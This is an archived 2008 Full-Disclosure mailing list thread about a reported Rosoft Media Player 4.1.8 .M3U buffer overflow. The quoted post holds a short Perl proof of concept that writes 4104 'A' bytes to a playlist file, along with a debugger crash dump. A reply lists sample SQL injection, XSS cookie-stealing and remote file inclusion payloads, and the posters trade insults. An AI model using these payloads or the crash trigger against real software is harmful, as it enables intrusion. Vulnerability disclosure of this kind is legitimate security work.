| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 15 Feb 2008 16:18:53 -0600 From: "Fredrick Diggle" <fdiggle@...il.com> To: reepex <reepex@...il.com> Cc: securfrog <securfrog@...il.com>, full-disclosure@...ts.grok.org.uk Subject: Re: Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U) But then what will Fredrick Diggle do with free time at zoo? google code search regexing is all he knows :( On Feb 15, 2008 2:17 PM, reepex <reepex@...il.com> wrote: > I could not agree more! no talent = do not post ... every one else agree > with me and securfrog? > > On Fri, Feb 15, 2008 at 2:06 PM, securfrog <securfrog@...il.com> wrote: > > > Well ... nice vision here ... then in this case , let's stop posting > injection sql , xss , rfi , lfi and all kind of web application bugs . > > We know how much talent it takes to find theses bugs,on these cms you can > find , on cnet , download.com , sourceforge and stuff. > > > > [ > > var=123 > > var=-1+union/* => wow .. injection > > var=<script>alert(document.cookie)</script> => wow xss > > var=http://bla.com/file.txt? => wow code exec > > etc ... > > ] > > > > Let's do the same with ftp servers , finding a CWD AA crash is pretty > dummy to doh. > > > > Bugs are now rated by originality, not the impact , thanks for the > notification reepex . > > > > > > > > > > > > > > > > > > > > 2008/2/15, reepex <reepex@...il.com>: > > > > > > > > > > > > > > > can you please stop sending this retarded crap... we all know how much > talent it takes to write thousands of As to a file and then open it with > every application on cnet download.com and sourceforge but we do not care > > > > > > > > > > > > > > > On Fri, Feb 15, 2008 at 12:07 PM, lorenzo <securfrog@...il.com> wrote: > > > > > > > > > > > > > > > > > > > > > ############################################################################################### > > > > > #Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U) > > > > > # > > > > > # @nolife : Pow...Pow ..If you are kind i'll show you my set of > supers mega Tools, fuzzers ,and all the automated stuff i use For > M3U/ASX/PLS Pow..Pow ... > > > > > # Nolifing is actually a Disease... Do not be mean with nolife's > > > > > # > > > > > # > > > > > # eax=41414141 ebx=41414141 ecx=00000000 edx=00ba9078 esi=0012eb7c > edi=00ba9078 > > > > > # eip=00403b9c esp=0012eb4c ebp=0012fb80 iopl=0 nv up ei > pl nz na pe nc > > > > > # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 > efl=00010206 > > > > > # RosoftMediaPlayerFree+0x3b9c: > > > > > # 00403b9c 8b10 mov edx,dword ptr [eax] > ds:0023:41414141=???????? > > > > > # > > > > > # > > > > > my $chars= "A" x 4104; > > > > > my $file="I_Shot_The_Nolife.m3u"; > > > > > open(my $FILE, ">>$file") or die "Cannot open $file: $!"; > > > > > print $FILE $chars; > > > > > close($FILE); > > > > > print "$file has been created \n"; > > > > > print "Credits:Securfrog"; > > > > > > > > > > > > _______________________________________________ > > > > Full-Disclosure - We believe in it. > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > > > > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists